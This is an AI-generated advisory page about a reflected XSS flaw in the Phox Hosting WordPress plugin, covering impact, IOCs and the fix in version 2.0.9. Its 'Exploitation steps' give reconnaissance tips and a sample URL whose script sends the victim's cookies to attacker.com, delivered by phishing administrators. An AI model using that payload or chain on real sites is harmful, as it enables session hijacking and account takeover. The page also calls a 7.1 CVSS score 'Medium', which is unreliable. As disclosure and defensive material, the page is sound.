CVE-2026-25013: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-25013 is a Reflected Cross-Site Scripting (XSS) vulnerability in the WHMCSdes Phox Hosting WordPress plugin (slug: phox-host). It affects all versions up to and including 2.0.8, and was discovered by researcher João Pedro S Alcântara (Kinorth) on December 26, 2025, with public disclosure on March 18–25, 2026. The vulnerability carries a CVSS v3.1 base score of 7.1 (Medium) (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), caused by insufficient sanitization of user-supplied input that is reflected back in the plugin's web page output without proper encoding. An unauthenticated remote attacker can craft a malicious URL containing a JavaScript payload; when a privileged or authenticated user clicks the link, the script executes in their browser within the context of the WordPress site. No authentication is required on the attacker's side, but user interaction (e.g., clicking a crafted link) is a prerequisite for successful exploitation (Patchstack).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser session, enabling session cookie theft, credential harvesting, unauthorized actions performed on behalf of the victim, and injection of malicious redirects or advertisements into the affected WordPress site. Because the scope is changed (S:C in CVSS), the impact extends beyond the plugin itself to the broader WordPress environment, with low confidentiality, integrity, and availability impacts. Sites running the Phox Hosting plugin are at risk of being leveraged in mass-exploit campaigns targeting WordPress installations (Patchstack).

Exploitability

No public proof-of-concept exploit code or active in-the-wild exploitation has been reported as of the disclosure date. The EPSS score is approximately 0.033%, indicating a low near-term probability of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, Patchstack notes that medium-severity XSS vulnerabilities of this type are commonly used in mass-exploit campaigns targeting WordPress plugins at scale (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Phox Hosting plugin (version ≤ 2.0.8) using tools like WPScan, Shodan, or Google dorks targeting the plugin's known file paths or metadata.
  2. Identify vulnerable parameter: Analyze the plugin's front-end pages or request parameters that reflect user input without sanitization (e.g., query string parameters passed to plugin-rendered pages).
  3. Craft malicious URL: Construct a URL targeting the vulnerable endpoint with a reflected XSS payload embedded in the unsanitized parameter, e.g., https://target-site.com/?phox_param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Deliver payload: Send the crafted URL to a privileged WordPress user (e.g., administrator) via phishing email, social engineering, or embedded in a comment/forum post.
  5. Achieve objective: When the victim clicks the link and their browser renders the page, the injected script executes — stealing session cookies, performing actions as the victim, or redirecting to attacker-controlled infrastructure (Patchstack).

Indicators of compromise

  • Network: Outbound requests from victim browsers to unknown external domains immediately after loading a WordPress page with the Phox Hosting plugin; unusual referrer headers in web server logs pointing to crafted URLs with encoded script tags.
  • Logs: WordPress or web server access logs showing GET/POST requests to plugin-related endpoints containing URL-encoded JavaScript payloads (e.g., %3Cscript%3E, javascript:, onerror=, onload=) in query parameters.
  • Browser/Session: Unexpected session invalidation or admin account actions (e.g., new admin user creation, plugin installation) not initiated by legitimate users, potentially indicating session hijacking via stolen cookies.

Mitigation and workarounds

The vulnerability is patched in Phox Hosting plugin version 2.0.9. Site administrators should update the plugin to version 2.0.9 or later immediately via the WordPress admin dashboard or by downloading the updated plugin from the WordPress plugin repository. Patchstack users benefit from a virtual patch (mitigation rule) that blocks exploitation attempts until the plugin is updated. If an immediate update is not possible, consider temporarily deactivating the plugin or restricting access to affected pages (Patchstack).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management